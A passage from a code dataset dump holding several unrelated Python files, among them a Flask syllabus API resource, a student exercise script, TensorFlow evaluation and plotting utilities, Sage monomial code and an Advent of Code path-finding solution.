删除原有记录\n status = delete_record(db, collection)\n if status != True:\n return {\"error\": repr(status[1])}, 500\n\n collection = models.SyllabusCollection(collection_id=args[\"collection_id\"], syllabus=args[\"syllabus\"], account=args[\"username\"])\n\n result = common.add_to_db(db, collection)\n if result == True:\n return {\"id\": collection.id}\n else:\n return {\"error\": \"commit error in mysql\"}, 500\n\n\n def delete(self):\n self.DELETE_PARSER.add_argument(\"username\", required=True, location=\"headers\")\n self.DELETE_PARSER.add_argument(\"token\", required=True, location=\"headers\")\n self.DELETE_PARSER.add_argument(\"id\", required=True, location=\"headers\")\n\n args = self.DELETE_PARSER.parse_args()\n # 检查token\n user = common.query_single_by_filed(models.User, \"account\", args[\"username\"])\n if user is None:\n return {\"error\": \"user doesn't exist\"}, 404\n\n if not check_token(user, args[\"token\"]):\n return {\"error\": \"token is wrong\"}, 401\n\n collection = common.query_single_by_id(models.SyllabusCollection, args[\"id\"])\n if collection is None:\n return {\"error\": \"collection not found\"}, 404\n\n if collection.account == args[\"username\"]:\n status = delete_record(db, collection)\n if status == True:\n return {\"status\": \"deleted\"}\n else:\n return {\"error\": repr(status[1])}, 500\n else:\n collector = common.query_single_by_filed(models.Collector, \"collection_id\", collection.collection_id)\n if collector is None:\n return {\"error\": \"collector not found\"}, 404\n if collector.uid == user.id:\n status = delete_record(db, collection)\n if status == True:\n return {\"status\": \"deleted\"}\n else:\n return {\"error\": repr(status[1])}, 500\n else:\n return {\"error\": \"have not the permission\"}, 403","repo_name":"xiaofud/syllabus_backend","sub_path":"app/mod_interaction/resources/SyllabusCollectionResource.py","file_name":"SyllabusCollectionResource.py","file_ext":"py","file_size_in_byte":6501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"12550760760","text":"from datetime import date\nimport queue\n\ndata = (\"Круглов Никита Викторович\", 30, 8, 2003)\n\ncertificate = {\n \"Русский язык\": 4,\n \"Литература\": 4,\n \"Иностранный язык\": 5,\n \"Алгебра и начала анализа\": 4,\n \"Геометрия\": 4,\n \"Информатика и ИКТ\": 4,\n \"История России\": 4,\n \"Всеобщая история\": 5,\n \"Обществознание\": 4,\n \"География\": 5,\n \"Химия\": 4,\n \"Биология\": 4,\n \"Физика\": 5,\n \"Астрономия\": 4,\n \"Физкультура\": 5,\n \"ОБЖ\": 5,\n \"Избранные разделы математики для старшей школы\": 4,\n \"Компьютерная инженерная графика\": 5 \n}\n\nfamily_names = [\"Никита 2003\", \"Виктория 2010\", \"Виктор 1970\", \"Людмила 1975\", \"Ксения 2018\", \"Дмитрий 1993\"]\n\nnamekiwa = \"Арагог\"\n\n\naverage_mark = sum(certificate.values())/len(certificate.values())\nprint(\"1.Средняя оценка в аттестате:\", average_mark)\n\nunique_names = list(set(family_names))\nprint(\"2.Уникальные имена среди родственников:\\n\", unique_names)\n\ncer_len = [0]*len(certificate.values())\ncount = 0\ndisk_marks_string = \"\"\nfor i in certificate.keys():\n cer_len[count] = i\n disk_marks_string += cer_len[count]\n count += 1\nprint(\"3.Общая длина всех названий предметов:\", len(disk_marks_string))\n\nunique_letters = set()\nfor cer in certificate:\n unique_letters.update(certificate)\nprint(\"4.Уникальные буквы в названиях предметов:\", unique_letters)\n\nbin_kiwa_name = list(format(c, 'b') for c in bytearray(namekiwa, \"utf-8\"))\nprint(\"5.Имя пушистой кивы в бинарном виде:\", namekiwa)\n\nsorted_names = sorted(family_names, reverse=True)\nprint(\"6.Отсортированный по алфавиту в обратном порядке список родственников:\", sorted_names)\n\nprint(\"7.Количество дней от даты рождения до текущей даты: {}\".format((date.today() - date(day=int(data[1]), month=int(data[2]), year=int(data[3]))).days))\n\nq = queue.Queue()\nprint('Чтобы прекратить ввод введите end: ')\nwhile True:\n subject = input(' ')\n if subject == 'end':\n break\n else:\n q.put(subject)\nprint(\"8.FIFO очередь: \")\nwhile True:\n print(q.get(), end=', ')\n if q.empty()==True:\n break\n\nAztec= ['Tenoch', 'Acamapochtli', 'Huitzilihitl', 'Chimalpopoca', 'Xihuitl Temoc',\n 'Itzcoatl', 'Moctezuma I', 'Atotoztli', 'Axayacatl', 'Tizoc', 'Ahuitzotl',\n 'Moctezuma II', 'Cuitlahuac', 'Cuauhtrmoc', 'Tlacotzin', 'Motelchiuhtzin',\n 'Xochiquentzin', 'Huanitzin', 'Tehuetzquititzin', 'Cecetzin', 'Cipac']\nnumber = (int(data[1]) + int(data[2])**2 + int(data[3])) % 21 + 1\nindex = input(\"Введите индекс\")\nindex = int(index)\nif index >= 0 and index < len(sorted_names):\n sorted_names[index] = Aztec[number]\n\nprint(\"9.Cписок родственников:\", sorted_names)\n\nfamilynameslinked = {\"Никита 2003\":1, \"Виктория 2010\":2, \"Виктор 1970\":3, \"Людмила 1975\":4, \"Ксения 2018\":5, \"Дмитрий 1993\":6}\nprint(\"10.Список\", familynameslinked)\n\nnumber = (len(data[0]) * len(family_names)) % 4\n\n\ndef tribonacci_generator():\n a, b, c = 0, 0, 1\n yield a\n yield b\n yield c\n\n while True:\n next_num = a + b + c\n yield next_num\n a, b, c = b, c, next_num\n\n\nn = 10\n\ntribonacci = tribonacci_generator()\ntribonacci_sequence = [next(tribonacci) for _ in range(n)]\n\nprint(\"11.Последовательность чисел Трибоначчи:\")\nprint(tribonacci_sequence)\n","repo_name":"kit8nino/2023-MP","sub_path":"426/Kruglov Nikita/[1].py","file_name":"[1].py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"72937538681","text":"from typing import Any, Dict, Optional, Callable, Tuple\r\n\r\ndef encode(data: Dict[str,Any],\r\n unpicklable: bool = True,\r\n make_refs: bool = True,\r\n keys: bool = False,\r\n max_depth: Optional[int] = None,\r\n reset: bool = True,\r\n backend: Any = None,\r\n warn: bool = False,\r\n context: Any = None,\r\n max_iter: Optional[int] = None,\r\n use_decimal: bool = False,\r\n numeric_keys: bool = False,\r\n use_base85: bool = False,\r\n fail_safe: Optional[Callable[[], None]] = None,\r\n indent: Optional[int] = None,\r\n separators: Optional[Tuple[str]] = None) -> str: ...\r\ndef decode(data: str,\r\n backend: Any = None,\r\n context: Any = None,\r\n keys: bool = False,\r\n reset: bool = True,\r\n safe: bool = False,\r\n classes: Any = None) -> Dict[str,Any]: ...","repo_name":"lexasss/carla-mirror","sub_path":"typings/jsonpickle/__init__.pyi","file_name":"__init__.pyi","file_ext":"pyi","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2264319182","text":"# Lint as: python3\n\"\"\"Evaluation script.\"\"\"\n\nimport os\nimport yaml\nfrom absl import app\nfrom absl import flags\nimport tensorflow as tf\nimport gc\n\nfrom data_lib.get_segmentation_dataset import get_segmentation_dataset\nfrom evaluation_lib import evaluate_utils\nfrom model_lib.baselines_seg import EnsembleSeg\nfrom training_lib.utils import load_model_segmentation\nfrom data_lib.get_segmentation_dataset import get_cityscapes_testset\nfrom data_lib.get_segmentation_dataset import load_cityscapes_testset_np\n\n\n# Define Flags.\nflags.DEFINE_list( # exp_name is list for compatibility of ensembles\n 'exp_name', '', 'Name of the experiment to be evaluated.')\nflags.DEFINE_string(\n 'exp_root', '', 'Root directory of experiments.')\nflags.DEFINE_bool('mcd', False, 'Use MC dropout for uncertainty estimation.')\nflags.DEFINE_bool('mir', False, 'Use MIR for uncertainty estimation.')\nflags.DEFINE_integer('nr_samples', 10, 'Number of samples for MC dropout.')\nflags.DEFINE_bool('debug', False, 'Debug mode. Eager execution.')\n\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n\n print('Evaluating model...', flush=True)\n\n tf.config.run_functions_eagerly(FLAGS.debug)\n\n # get experiment folder and create dir for plots\n exp_folders = [os.path.join(FLAGS.exp_root, name) for name in FLAGS.exp_name]\n results_folder = os.path.join(exp_folders[0], 'results')\n tf.io.gfile.mkdir(results_folder)\n\n # get experiment FLAGS\n TRAINING_FLAGS = yaml.load(\n tf.io.gfile.GFile(os.path.join(exp_folders[0], 'FLAGS.yml'), 'r'),\n Loader=yaml.Loader)\n if 'ensemble' not in TRAINING_FLAGS.keys():\n TRAINING_FLAGS['ensemble'] = False\n\n # get in-distribution datasets\n print('Loading dataset...', flush=True)\n TRAINING_FLAGS['batch_size'] = 1 # evaluate with batch_size 1\n\n # get dataset\n data_root = TRAINING_FLAGS['data_root']\n trainset, valset, testset = get_segmentation_dataset(\n TRAINING_FLAGS['dataset'],\n data_root=data_root,\n batch_size=TRAINING_FLAGS['batch_size'])\n if TRAINING_FLAGS['dataset'] == 'cityscapes':\n print('Loading numpy testset ...', flush=True)\n testset_np = load_cityscapes_testset_np(\n data_root=data_root, testset=testset)\n print('Finished loading numpy testset ...', flush=True)\n\n if FLAGS.mcd:\n TRAINING_FLAGS['method'] = 'dropout'\n if FLAGS.mir:\n TRAINING_FLAGS['method'] = 'mir'\n TRAINING_FLAGS['reconstruction_weight'] = 0 # does not matter during inference\n\n # create model and load weights\n if len(exp_folders) == 1:\n model, _ = load_model_segmentation(\n method=TRAINING_FLAGS['method'],\n hyperparameters=TRAINING_FLAGS,\n exp_folder=exp_folders[0],\n trainset=trainset,\n valset=valset,\n load_weights=True,\n evaluation=True)\n elif len(exp_folders) > 1: # more than 1 exp_name --> ensemble method\n TRAINING_FLAGS['ensemble_size'] = len(exp_folders)\n model = EnsembleSeg(**TRAINING_FLAGS)\n\n # call model once for init\n _, init_input = enumerate(testset).__next__()\n _ = model(init_input[0])\n\n try:\n model.custom_load_weights(filepath=[os.path.join(f, 'best_model.h5') for f in exp_folders])\n except:\n model.custom_load_weights(filepath=[os.path.join(f, 'best_model.tf') for f in exp_folders])\n model.compile()\n else:\n raise ValueError('Unknown method!')\n\n #########################################\n # compute metrics for calibration of\n # epistemic uncertainty under distributional shift\n #########################################\n print('Evaluate Calibration')\n # if TRAINING_FLAGS['dataset'] == 'cityscapes':\n # test_predictions = evaluate_utils.predict_uncertainty(\n # model=model, data_loader=valset)\n # predictions[0] = evaluate_utils.predict_uncertainty(\n # model=model, data_loader=testset)\n for perturbation in evaluate_utils.PERTURBATIONS[TRAINING_FLAGS['dataset']]:\n results_perturbation_folder = os.path.join(results_folder,\n f'perturbation_{perturbation}')\n tf.io.gfile.mkdir(results_perturbation_folder)\n\n perturbation_range = evaluate_utils.PERTURBATION_RANGES[perturbation]\n predictions = dict()\n if TRAINING_FLAGS['dataset'] == 'cityscapes':\n # predictions[0] = test_predictions\n predictions[0] = evaluate_utils.predict_uncertainty(\n model=model, data_loader=testset)\n for p in perturbation_range:\n\n print(f'evaluating {perturbation} = {p}', flush=True)\n\n # get OOD data\n if TRAINING_FLAGS['dataset'] == 'cityscapes':\n oodset = get_cityscapes_testset(\n testset_np[0], testset_np[1],\n batch_size=TRAINING_FLAGS['batch_size'],\n corruption=perturbation, severity=p) # perturbation\n else:\n raise ValueError(f'Unknown dataset {TRAINING_FLAGS[\"dataset\"]}!')\n\n # make predictions\n predictions[p] = evaluate_utils.predict_uncertainty(\n model=model, data_loader=oodset)\n\n del oodset\n gc.collect()\n\n metrics = evaluate_utils.compute_calibration_metrics(\n predictions=predictions, segmentation=True,\n dataset=TRAINING_FLAGS[\"dataset\"])\n evaluate_utils.postprocess_calibration_metrics(\n calibration_metrics=metrics, results_path=results_perturbation_folder)\n #########################################\n\n print('Evaluation done.')\n\n\nif __name__ == '__main__':\n app.run(main)\n","repo_name":"janisgp/practicality_deterministic_epistemic_uncertainty","sub_path":"evaluate_semantic_segmentation.py","file_name":"evaluate_semantic_segmentation.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70151576760","text":"\"Monomials\"\n\ndef _monomials(gens, R, n, i):\n \"\"\"\n Given two lists ``gens`` and ``n`` of exactly the same length,\n return all monomials in the elements of ``gens`` in ``R`` where\n the ``i``-th generator in the monomial appears to degree strictly\n less than ``n[i]``.\n\n EXAMPLES::\n\n sage: monomials([x], [3]) # indirect doctest\n [1, x, x^2]\n \"\"\"\n # each power of the ith generator times all products\n # not involving the ith generator.\n if len(gens) == 1:\n b = gens[0]\n v = [R(1)]\n for _ in range(n[0]-1):\n v.append(v[-1]*b)\n return v\n else:\n z = gens[i]\n w = list(gens)\n del w[i]\n nn = list(n)\n del nn[i]\n v = monomials(w, nn)\n k = len(v)\n for _ in range(n[i]-1):\n for j in range(k):\n v.append(v[j]*z)\n z *= gens[i]\n return v\n\nfrom sage.structure.sequence import Sequence\n\ndef monomials(v, n):\n \"\"\"\n Given two lists ``v`` and ``n``, of exactly the same length,\n return all monomials in the elements of ``v``, where\n variable ``i`` (i.e., ``v[i]``) in the monomial appears to\n degree strictly less than ``n[i]``.\n\n INPUT:\n\n - ``v`` -- list of ring elements\n\n - ``n`` -- list of integers\n\n EXAMPLES::\n\n sage: monomials([x], [3])\n [1, x, x^2]\n sage: R.<x,y,z> = QQ[]\n sage: monomials([x,y], [5,5])\n [1, y, y^2, y^3, y^4, x, x*y, x*y^2, x*y^3, x*y^4, x^2, x^2*y, x^2*y^2, x^2*y^3, x^2*y^4, x^3, x^3*y, x^3*y^2, x^3*y^3, x^3*y^4, x^4, x^4*y, x^4*y^2, x^4*y^3, x^4*y^4]\n sage: monomials([x,y,z], [2,3,2])\n [1, z, y, y*z, y^2, y^2*z, x, x*z, x*y, x*y*z, x*y^2, x*y^2*z]\n \"\"\"\n\n if (len(v) != len(n)):\n raise ValueError(\"inputs must be of the same length.\")\n if len(v) == 0:\n return []\n v = Sequence(v)\n R = v.universe()\n return _monomials(v, R, n, 0)\n","repo_name":"sagemath/sage-archive-2023-02-01","sub_path":"src/sage/rings/monomials.py","file_name":"monomials.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":2037,"dataset":"github-code","pt":"40"} +{"seq_id":"23780677012","text":"import matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nfrom matplotlib import style\nfrom seaborn import set_palette, regplot, scatterplot, relplot\nfrom scdata.utils import std_out, dict_fmerge\nfrom scdata._config import config\nfrom .plot_tools import prepare_data, colors\nfrom numpy import array\nfrom math import floor, ceil\n\ndef scatter_plot(self, **kwargs):\n \"\"\"\n Plots correlation in matplotlib plot\n Parameters\n ----------\n traces: dict\n Data for the plot, with the format:\n traces = {1: {'devices': ['10751', '10751'],\n 'channels': ['TEMP', 'GB_2A'],\n 'subplot': 1},\n 2: {'devices': ['10752', '10752'],\n 'channels': ['TEMP', 'GB_2A'],\n 'subplot': 1}\n 3: {'devices': ['10751', '10751'],\n 'channels': ['TEMP', 'GB_2W'],\n 'subplot': 2}\n 4: {'devices': ['10752', '10752'],\n 'channels': ['TEMP', 'GB_2W'],\n 'subplot': 2}\n }\n options: dict\n Options including data processing prior to plot. Defaults in config._plot_def_opt\n formatting: dict\n Formatting dict. Defaults in config._scatter_plot_def_fmt\n Returns\n -------\n Matplotlib figure and axes\n \"\"\"\n\n if config.framework == 'jupyterlab': plt.ioff();\n plt.clf();\n\n if 'traces' not in kwargs:\n std_out('No traces defined', 'ERROR')\n return None\n else:\n traces = kwargs['traces']\n\n if 'options' not in kwargs:\n std_out('Using default options')\n options = config._plot_def_opt\n else:\n options = dict_fmerge(config._plot_def_opt, kwargs['options'])\n\n if 'formatting' not in kwargs:\n std_out('Using default formatting')\n formatting = config._scatter_plot_def_fmt['mpl']\n else:\n formatting = dict_fmerge(config._scatter_plot_def_fmt['mpl'], kwargs['formatting'])\n\n # Style\n if formatting['style'] is not None: style.use(formatting['style'])\n else: style.use(config._plot_style)\n\n # Palette\n if formatting['palette'] is not None: set_palette(formatting['palette'])\n\n # Font size\n if formatting['fontsize'] is not None: rcParams.update({'font.size': formatting['fontsize']});\n\n # Make it standard\n ptraces = dict()\n\n for trace in traces:\n if 'subplot' not in traces[trace]: traces[trace]['subplot'] = 1\n if 'channels' not in traces[trace]: ptraces = traces; continue\n\n ptrace_1 = trace * 10 + 1\n ptrace_2 = trace * 10 + 2\n\n ptraces[ptrace_1] = {'devices': traces[trace]['devices'][0],\n 'channel': traces[trace]['channels'][0],\n 'subplot': traces[trace]['subplot']\n }\n\n ptraces[ptrace_2] = {'devices': traces[trace]['devices'][1],\n 'channel': traces[trace]['channels'][1],\n 'subplot': traces[trace]['subplot']\n }\n\n # Workaround to get the hue here\n if 'hue' in traces[trace]:\n ptrace_3 = trace * 10 + 3\n ptraces[ptrace_3] = {'devices': traces[trace]['hue'][0],\n 'channel': traces[trace]['hue'][1],\n 'subplot': traces[trace]['subplot']\n }\n\n # Get dataframe\n df, subplots = prepare_data(self, ptraces, options)\n\n # If empty, nothing to do here\n if df is None:\n return None\n\n n_subplots = len(subplots)\n\n # Plot\n nrows = min(n_subplots, formatting['nrows'])\n ncols = ceil(n_subplots/nrows)\n\n figure, axes = plt.subplots(nrows, ncols, figsize = (formatting['width'],\n formatting['height'])\n );\n\n if n_subplots == 1:\n axes = array(axes)\n axes.shape = (1)\n\n cind = 0\n y_axes = list()\n x_axes = list()\n\n for i in subplots:\n for j in range(int(len(i)/2)):\n cind += 1\n if cind > len(colors)-1: cind = 0\n\n if nrows > 1 and ncols > 1:\n row = floor(subplots.index(i)/ncols)\n col = subplots.index(i)-row*ncols\n ax = axes[row][col]\n else:\n ax = axes[subplots.index(i)]\n\n kwargs = {\n 'data':df,\n 'ax': ax,\n 'label': f'{i[2*j+1]} vs. {i[2*j]}'\n }\n\n if len(i) == 3:\n\n if formatting['palette'] is None:\n cmap = plt.colormaps()[cind]\n else:\n cmap = formatting['palette']\n\n # Assume this is the hue\n norm = plt.Normalize(df[i[2]].min(), df[i[2]].max())\n sm = plt.cm.ScalarMappable(cmap=cmap, norm=norm)\n sm.set_array([])\n\n kwargs['hue'] = i[2]\n kwargs['palette'] = cmap\n kwargs['legend'] = False\n hashue=True\n\n else:\n if formatting['palette'] is None:\n kwargs['color'] = colors[cind]\n hashue=False\n\n scatterplot(df[i[2*j]], df[i[2*j+1]], **kwargs)\n\n if hashue:\n plt.colorbar(sm, ax = ax, orientation = 'vertical', label = i[2])\n\n if formatting['legend']:\n ax.set_title(f'{i[2*j+1]} vs. {i[2*j]}', fontsize = formatting['title_fontsize'])\n\n if formatting['ylabel'] is not None:\n try:\n ax.set_ylabel(formatting['ylabel']);\n except:\n std_out (f'y_label for subplot {subplots.index(i)} not set', 'WARNING')\n ax.set_ylabel('')\n pass\n else:\n ax.set_ylabel('')\n\n if formatting['xlabel'] is not None:\n try:\n ax.set_xlabel(formatting['xlabel']);\n except:\n std_out (f'x_label for subplot {subplots.index(i)} not set', 'WARNING')\n ax.set_xlabel('')\n pass\n else:\n ax.set_xlabel('')\n\n y_axes.append(ax.get_ylim())\n x_axes.append(ax.get_xlim())\n\n # Unify axes or set what was ordered\n for i in subplots:\n for j in range(int(len(i)/2)):\n\n if nrows > 1 and ncols > 1:\n row = floor(subplots.index(i)/ncols)\n col = subplots.index(i)-row*ncols\n ax = axes[row][col]\n else:\n ax = axes[subplots.index(i)]\n\n # Set y axis limit\n if formatting['yrange'] is not None and not formatting['sharey']:\n try:\n ax.set_ylim(formatting['yrange']);\n except:\n std_out (f'yrange for subplot {subplots.index(i)} not set', 'WARNING')\n pass\n elif formatting['sharey']:\n ax.set_ylim(min([yl[0] for yl in y_axes]), max([yl[1] for yl in y_axes]))\n\n # Set x axis limit\n if formatting['xrange'] is not None and not formatting['sharex']:\n try:\n ax.set_xlim(formatting['xrange']);\n except:\n std_out (f'xrange for subplot {subplots.index(i)} not set', 'WARNING')\n pass\n elif formatting['sharex']:\n ax.set_xlim(min([xl[0] for xl in x_axes]), max([xl[1] for xl in x_axes]))\n\n if formatting['legend']:\n ax.legend(loc='best')\n else:\n ax.get_legend().remove()\n\n # Set title\n figure.suptitle(formatting['title'], fontsize = formatting['title_fontsize']);\n plt.subplots_adjust(top = formatting['suptitle_factor']);\n\n if options['show']: plt.show();\n\n return figure, axes\n","repo_name":"fablabbcn/smartcitizen-data","sub_path":"scdata/test/plot/scatter_plot.py","file_name":"scatter_plot.py","file_ext":"py","file_size_in_byte":8107,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"34978894059","text":"import tensorflow as tf \r\nfrom tensorflow.keras.layers import Dense, Flatten, Input \r\nfrom tensorflow.keras.models import Model \r\n\r\n\r\ndef base_model() : \r\n\r\n inputs = Input(shape = (), name = 'clothing') \r\n x = Dense(64, activation= 'relu', name = 'dense_1')(inputs) \r\n x = Dense(64, activation= 'relu', name = 'dense_2')(x) \r\n output = Dense(10, activation= 'softmax', name = 'output') \r\n\r\n model = Model(inputs = inputs, outputs = output) \r\n return model \r\n\r\n\r\n","repo_name":"sasidhar-programmer/Tensorflow_Advance_Techniques","sub_path":"2-custom_and_distributed_training/pratice_py/5_custom_1.py","file_name":"5_custom_1.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"40"} +{"seq_id":"14426330977","text":"import numpy as np\nfrom scipy.spatial import distance\nimport matplotlib.pyplot as plt\n\nfrom pycrb import UV\n\n\nclass ArrayManifold(object):\n \"\"\"Array manifold class\"\"\"\n\n def __init__(self, N_, w_, x_, y_, n_theta_, n_phi_):\n\n self.N = N_\n self.w = w_\n self.x = x_\n self.y = y_\n self.n_theta = n_theta_\n self.n_phi = n_phi_\n\n def interelement_distance(x_, y_):\n\n return distance.cdist(x_, y_, 'euclidean')\n\n def array_manifold_vector(self, wavelength, uv: UV):\n\n U, V = np.meshgrid(uv.u, uv.v)\n\n VV = np.asarray([np.exp(1j * 2 * np.pi / wavelength * (xx * U + yy * V))\n for (xx, yy) in zip(self.x, self.y)])\n\n return VV\n\n def conventional_beamformer(self, wavelength, uv: UV, uv_s: UV):\n\n V = self.array_manifold_vector(wavelength, uv)\n\n V_s = self.array_manifold_vector(wavelength, uv_s)\n\n B_temp = np.reshape(\n np.multiply(\n V_s.flatten().conj().T,\n V.flatten()),\n (self.N,\n 128,\n 128))\n\n B = np.sum(B_temp, axis=0)\n\n return B\n\n def sampling_points(self):\n\n return self.x[None, :] - \\\n self.x[:, None], self.y[None, :] - self.y[:, None]\n\n def _plot(self, wavelength):\n\n plt.plot(self.x / wavelength, self.y / wavelength, 'o')\n plt.axis('equal')\n plt.xlabel('x (wavelengths)')\n plt.ylabel('y (wavelengths)')\n plt.grid()\n","repo_name":"mgoar/pycrb","sub_path":"pycrb/ArrayManifold.py","file_name":"ArrayManifold.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"73389363320","text":"#\n# timedelta objects\n#\n\nfrom datetime import date\nfrom datetime import time\nfrom datetime import datetime\nfrom datetime import timedelta\n\ndef main():\n # construct a basic timedelta and print it( timedelta is a span of time )\n print(timedelta(days=365, hours=5, minutes=1)) # 365 days, 5:01:00\n \n # print today's date\n now = datetime.now()\n print(\"Today is\", now) # Today is 2023-06-27 09:45:02.942544\n \n # print today's date one year from now\n print(\"One year from now it will be\", str(now + timedelta(days=365))) # One year from now it will be 2024-06-26 09:45:02.942544\n \n # create a timedelta that uses more than one argument\n print(\"In two weeks and 3 days it will be\", str(now + timedelta(weeks=2, days=3))) # In two weeks and 3 days it will be 2023-07-14 09:49:11.556998\n \n # calculate the date 1 week ago, formatted as a string\n t = datetime.now() - timedelta(weeks=1)\n s = t.strftime(\"%A %B %d, %Y\")\n print(\"One week ago it was\", s) # One week ago it was Tuesday June 20, 2023\n \n ## How many days until April Fools' Day?\n today = date.today()\n afd = date(today.year, 4, 1)\n \n # if it has, use the replace() function to get the date for next year\n if afd < today:\n print(\"April Fools' Day already went by:\", ((today - afd).days)) # April Fools' Day already went by: 87\n afd = afd.replace(year = today.year + 1)\n \n time_to_afd = afd - today\n print(\"It is\", time_to_afd.days, \"days until the next April Fool's Day!\") # It is 279 days until the next April Fool's Day!\n \nif __name__ == \"__main__\":\n main()","repo_name":"tjcchen/python-review","sub_path":"Ch4-Dates/timedeltas.py","file_name":"timedeltas.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40936595706","text":"import copy\nimport math\nimport sys\nsys.path.insert(0, '.')\nfrom tools import log\n\nclass Vertex():\n def __init__(self, distance,x,y):\n self.cost = math.inf\n self.distance = distance\n self.prev = None\n self.x = x\n self.y = y\n\n def __repr__(self) -> str:\n return str([self.cost,self.distance,self.prev,self.x,self.y])\n\ndef parse_data(data):\n l = len(data.split('\\n'))\n field = []\n for y,data_line in enumerate(data.split('\\n')*5): \n line = []\n for x,data_char in enumerate([list(data_line)]*5):\n for n, m in enumerate(data_char):\n a = (int(m) + x + int(y/(l)))\n line.append(Vertex(a if (a < 10) else (a-9),x*(len(data_line))+n,y))\n field.append(line)\n\n field[0][0].cost = 0\n\n return field\n\n\ndef get_costs(field,point):\n new_field = []\n finish = field[len(field)-1][len(field)-1]\n\n while True:\n \n for n in get_neighbors(field, point.x, point.y):\n if n != None:\n neighbor = field[n[1]][n[0]]\n a = point.cost + neighbor.distance\n \n if neighbor.cost > a:\n neighbor.cost = a\n neighbor.prev = point\n new_field.append(neighbor)\n\n point = min(new_field, key=lambda x: x.cost)\n new_field.remove(point)\n if point is finish:\n break\n \n return field\n \ndef get_smallest_not_visited_point(new_field):\n return min(new_field, key= lambda x: x.cost)\n\ndef get_neighbors(field,x,y):\n for elm in ((-1,0),(1,0),(0,-1),(0,1)):\n xn = x+elm[0]\n yn = y+elm[1]\n yield (xn,yn) if xn >= 0 and xn < len(field[0]) and yn < len(field) and yn >= 0 else None\n\ndef get_path(point):\n path = []\n while point.prev is not None:\n path.append(point)\n point = point.prev\n\n return path\n\ndef get_sum(path):\n sum = 0\n \n for point in path:\n sum += point.distance\n \n return sum\n@log\ndef main(data):\n data = parse_data(data)\n data = (get_costs(data,data[0][0]))\n\n print(\"Done!\")\n \n return get_sum(get_path(data[len(data)-1][len(data[0])-1]))\n\n\ndata1 = open(\"./Day 15/data1\", \"r\").read()\ndata2 = open(\"./Day 15/data2\", \"r\").read()\n\nmain(data1)\nmain(data2)","repo_name":"mightytry/AdventOfCode","sub_path":"Adventofcode 2021/Day 15/Chiton2.py","file_name":"Chiton2.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"35567116451","text":"import os\nimport cv2\nimport sys\nimport time\nfrom skimage.measure import compare_ssim as ssim\nfrom tqdm import tqdm\nimport imageio\nimport math\n\nimport tkinter as tk\nfrom PIL import Image, ImageDraw, ImageTk\n\nimport tensorflow as tf\nimport scipy.misc as sm\nimport scipy.io as sio\nimport numpy as np\nimport skimage.measure as measure\n\nimport sys\n\n#change this to where the training folder is located\npath_to_evalmodel = '../../large data format/eval_large_data_format'\nsys.path.insert(0, path_to_evalmodel)\n\nfrom move_network_val_large_data_format import MCNET\nfrom utils import *\nfrom os import listdir, makedirs, system\nfrom os.path import exists\nfrom argparse import ArgumentParser\nfrom skimage.draw import line_aa\npath_to_pp = '../'\nsys.path.insert(0, path_to_pp)\nimport preprocessing_situ_all_data as pp\n\nthresh = 96\n\n#global variable init\nreturn_clips = []\nreturn_transformation = []\noccupancy_buffer = []\ntransformation_buffer = []\nocclusion_buffer = []\nrgb_buffer = []\ndepth_buffer = []\nsegmentation_buffer = []\ndata_size = []\ndirection_buffer = []\nsess = -1\nmodel = -1\nimage_size = -1\ndata_w = -1\ndata_h = -1\ncanvas = -1\n\ndef init(checkpoint_dir_loc, prefix, image_size_i=96, data_w_i=240, data_h_i=80, K_i=9, T_i=10, seq_steps=1, useDenseBlock=False, samples=1):\n global K, T, sess, model, image_size, data_h, data_w, canvas\n root = tk.Tk()\n canvas = tk.Canvas(root, width=(data_w_i*3+data_h_i), height=(data_h_i*T_i), bd=0, highlightthickness=0)\n canvas.pack()\n data_w = data_w_i\n data_h = data_h_i\n image_size = image_size_i\n gpu = np.arange(1)\n K = K_i\n T = T_i\n print(\"Setup variables...\")\n datasze_tf = np.zeros(2)\n datasze_tf[0] = data_w\n datasze_tf[1] = data_h\n imgsze_tf = image_size\n seqlen_tf = seq_steps\n K_tf = K_i\n T_tf = T_i\n fc_tf = K #we have K frames, we predict next T\n assert(seq_steps <= seqlen_tf)\n assert(K <= K_tf)\n assert(T <= T_tf)\n assert(seqlen_tf == 1)\n\n #first dim = batch_size, set to 1, needed for compatibility with model\n input_batch_shape = [1, imgsze_tf, imgsze_tf, seqlen_tf*(K_tf), 2]\n maps_batch_shape = [1, imgsze_tf, imgsze_tf, seqlen_tf*(K_tf)+1, 2]\n transformation_batch_shape = [1, seqlen_tf*(K_tf),3,8]\n rgb_batch_shape = [1, fc_tf,datasze_tf[1],datasze_tf[0],3]\n segmentation_batch_shape = [1, fc_tf,datasze_tf[1],datasze_tf[0],3]\n depth_batch_shape = [1, fc_tf,datasze_tf[1],datasze_tf[0],1]\n direction_batch_shape = [1, fc_tf,2]\n\n graph = tf.Graph()\n with graph.as_default():\n checkpoint_dir = checkpoint_dir_loc + prefix + \"/\"\n best_model = None # will pick last model\n\n # initialize model\n model = MCNET(image_size=[image_size, image_size], data_size=[data_h, data_w], batch_size=1, K=K,\n T=T, c_dim=1, checkpoint_dir=checkpoint_dir,\n iterations=seq_steps, useSELU=True, motion_map_dims=2,\n showFutureMaps=False, useDenseBlock=useDenseBlock, samples=samples)\n\n # Setup model (for details see training_large_data_format folder)\n model.pred_occlusion_map = 